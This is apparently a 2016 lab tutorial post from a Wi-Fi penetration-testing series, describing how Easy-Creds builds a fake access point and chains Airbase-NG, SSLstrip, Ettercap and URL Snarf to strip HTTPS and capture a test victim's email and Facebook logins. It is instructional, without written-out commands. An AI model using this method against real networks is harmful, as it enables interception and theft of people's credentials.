Monday, October 17, 2016

WI-FI PT / 4 - ATTACKS MAN-IN-THE-MIDDLE / 4.6 - Automating wireless MITM attacks with Easy-Creds

4.6 - Automating MITM attacks with Easy-Creds

- Easy-Creds is a powerful bash script whose main interest is to gather different hacking tools in just one suite of tools. Using Easy-Creds a lot of exploitation attacks can be launched in an automated way.

- From "kali", the attacker machine, easy-creds is started up:

- The first screen allows the user to choose between different options. For instance, option 3 creates a fake AP:

Option 1 allows a simple fake AP static attack:

The attack is not related with a web session hicjacking:

"kali" is connected wiredly to the Internet with eth0 interface:

"kali" is connected wiressly to the victim "roch" with wlan0 interface:

- The fake AP is called mitm:

The channel in use is 6:

The monitor interface is mon0:

- The MAC address won't be changed:

- The tunnel interface is at0:

- Because "kali" is not acting as the DHCP server, dhcpd.conf is not altered:

The local network used by "kali" and "roch" is

- From the DNS servers offered by the ISP, the first one is picked up:

Finally, the attack is launched:

- It is quite interesting to see how Easy-Creds allows to use at the same time all well-known tools and applications (Airbase-NG, DMESG, SSLstrip, Ettercap, URL Snarf, Dsniff). Once the attack configuration is finished, the different tools screens are displayed one on top of the next:

- At this point of the attack, "kali" using Easy-Creds waits until a user from the victim "roch" connects to mitm:

- Airbase-NG detects the association of "roch" (Client 28:C6:8E:63:15:6B) to the created fake AP called mitm:

Ettercap detects how the DHCP server (the legitimate AP located at "kali"s wired eth0 interface) is offering to "roch" the IP=, the default gateway GW=, and DNS=

It can be verified that "roch", once connected to mitm, accepts those 3 parameters: IP, GW and DNS.

If the victims connects to the Internet, either to, or any other website, URL Snarf eavesdrops the connections immediately:

Now, the client tries to check his email account usual, because "kali" is acting as the Man-In-The-Middle, no padlock, HTTPS or green URL bar is shown:

Ettercap captures the account name ( and the password (passwordPFM):

- Finally, for the purpose of expanding the demostration of this practice, a Facebook test account is created:

       i) Email:
       ii) Password: passwordPFM

- If the clients tried to connect the Facebook server normally (before the attack is launched), he would see the padlock and the HTTPS green bar at the URL, ensuring that the connection is being secured:

However, once the MITM attack has been launched, the URL changes its look. No more padlock or green HTPPS at the URL bar:

Again, Ettercap captures credentials and passwordPFM for the Facebook account:

If the attack is not launched in a smart way, it might appear to the client a screen warning that the connection is not being safe, because of the untruthful certificate used:

- Of course, under any circumstances the user should click "Proceed anaway". However, according to some Google's statistics, many users actually ignore the warning, clicking "Proceed anaway" instead of "Back to safety".